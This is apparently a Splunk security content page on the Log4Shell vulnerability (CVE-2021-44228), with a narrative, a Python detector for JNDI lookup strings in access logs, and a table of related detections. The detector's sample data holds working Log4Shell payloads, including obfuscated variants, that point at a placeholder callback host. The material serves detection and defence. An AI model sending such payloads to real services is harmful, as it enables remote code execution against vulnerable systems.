
Description

Log4Shell (CVE-2021-44228) is a Remote Code Execution (RCE) vulnerability in the Apache Log4j library, a widely used logging framework for Java. The vulnerability allows an attacker who can control log messages to execute arbitrary code loaded from attacker-controlled servers, and we anticipate that most applications using the Log4j library will meet this condition.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint, Network_Traffic, Risk, Web
  • Last Updated: 2021-12-11
  • Author: Jose Hernandez
  • ID: b4453928-5a98-11ec-afcd-8de10b48fc52

Narrative

In late November 2021, Chen Zhaojun of Alibaba identified a remote code execution vulnerability in Log4j. Earlier work on the underlying technique appeared in a 2016 Black Hat talk by Alvaro Munoz and Oleksandr Mirosh, "A Journey from JNDI/LDAP Manipulation to Remote Code Execution Dream Land". The issue was assigned CVE-2021-44228 and released to the public on December 10, 2021. It is exploited through improper deserialization of user input passed into the framework. Beyond remote code execution, it can allow an attacker to leak sensitive data, such as environment variables, or execute malicious software on the target system.
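To make the injection step concrete from the detection side, the following is an added Python example, not part of this analytic story and not Splunk's own detection logic (the story's detections are SPL searches). It scans constructed web-access log lines for JNDI lookup strings of the kind the "Log4Shell JNDI Payload Injection Attempt" detection looks for, first collapsing the nested lookups (`${lower:x}`, `${upper:x}`, `${…:-x}`) that Log4j resolves before the outer lookup runs, so that split-up tokens are seen as plain text. The log lines, source addresses and the `scanner.example.invalid` callback host are all constructed placeholders.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (not real traffic): a benign request, a plain
# JNDI lookup in the User-Agent, a lookup hidden with ${lower:x} nesting in the
# Referer, and one built from ${::-x} default-value lookups.
SAMPLE_LOG_LINES = [
    '203.0.113.10 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.example.invalid/a}"',
    '203.0.113.12 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 200 512 "${${lower:j}ndi:${lower:l}dap://scanner.example.invalid/b}" "curl/7.79"',
    '203.0.113.13 - - [10/Dec/2021:12:00:04 +0000] "GET /api HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://scanner.example.invalid/c}"',
]

# Inner lookups Log4j evaluates before the surrounding ${jndi:...}:
#   ${lower:x} / ${upper:x}  -> case-changed literal x
#   ${<anything>:-x}         -> the default value x
_INNER_LOOKUP = re.compile(
    r"\$\{(lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.IGNORECASE
)

# Outer lookup once normalized: ${jndi:<scheme>://<host[:port]>...
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)", re.IGNORECASE)


def _resolve(m: "re.Match") -> str:
    """Replace one inner lookup with the literal text it evaluates to."""
    if m.group(1) is not None:
        return m.group(2).upper() if m.group(1).lower() == "upper" else m.group(2).lower()
    return m.group(3)


def normalize_lookups(text: str) -> str:
    """Repeatedly collapse nested case/default lookups until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _INNER_LOOKUP.sub(_resolve, text)
    return text


def scan_log_line(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for a line carrying a JNDI lookup, or None for a clean line."""
    normalized = normalize_lookups(line)
    m = _JNDI.search(normalized)
    if not m:
        return None
    return {
        "src_ip": line.split(" ", 1)[0],        # first field of the access-log line
        "scheme": m.group(1).lower(),            # e.g. ldap, rmi, dns
        "callback_host": m.group(2),             # where the vulnerable host would connect out
        "obfuscated": normalized != line,        # true when nested lookups hid the token
    }


def scan_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Scan a batch of lines and keep only the positive findings."""
    return [f for f in (scan_log_line(line) for line in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan_log_lines(SAMPLE_LOG_LINES):
        print(finding)
```

The `callback_host` field is the value worth pivoting on: a matching outbound LDAP or RMI connection from the Java process to that host is what separates a scan that hit a patched server from an actual exploitation, which is the distinction the "Log4Shell JNDI Payload Injection with Outbound Connection" and "Detect Outbound LDAP Traffic" detections draw.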

Detections

| Name | Technique | Type |
| --- | --- | --- |
| Any Powershell DownloadFile | Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer | TTP |
| CMD Carry Out String Command Parameter | Windows Command Shell, Command and Scripting Interpreter | Hunting |
| Curl Download and Bash Execution | Ingress Tool Transfer | TTP |
| Detect Outbound LDAP Traffic | Exploit Public-Facing Application, Command and Scripting Interpreter | Hunting |
| Hunting for Log4Shell | Exploit Public-Facing Application, External Remote Services | Hunting |
| Java Class File download by Java User Agent | Exploit Public-Facing Application | TTP |
| Linux Java Spawning Shell | Exploit Public-Facing Application, External Remote Services | TTP |
| Log4Shell CVE-2021-44228 Exploitation | Ingress Tool Transfer, Exploit Public-Facing Application, Command and Scripting Interpreter, External Remote Services | Correlation |
| Log4Shell JNDI Payload Injection Attempt | Exploit Public-Facing Application, External Remote Services | Anomaly |
| Log4Shell JNDI Payload Injection with Outbound Connection | Exploit Public-Facing Application, External Remote Services | Anomaly |
| Outbound Network Connection from Java Using Default Ports | Exploit Public-Facing Application, External Remote Services | TTP |
| PowerShell - Connect To Internet With Hidden Window | PowerShell, Command and Scripting Interpreter | Hunting |
| Wget Download and Bash Execution | Ingress Tool Transfer | TTP |
| Windows Java Spawning Shells | Exploit Public-Facing Application, External Remote Services | TTP |
| Windows Powershell Connect to Internet With Hidden Window | Automated Exfiltration | Anomaly |
| Windows Powershell DownloadFile | Automated Exfiltration | Anomaly |

Reference

source | version: 1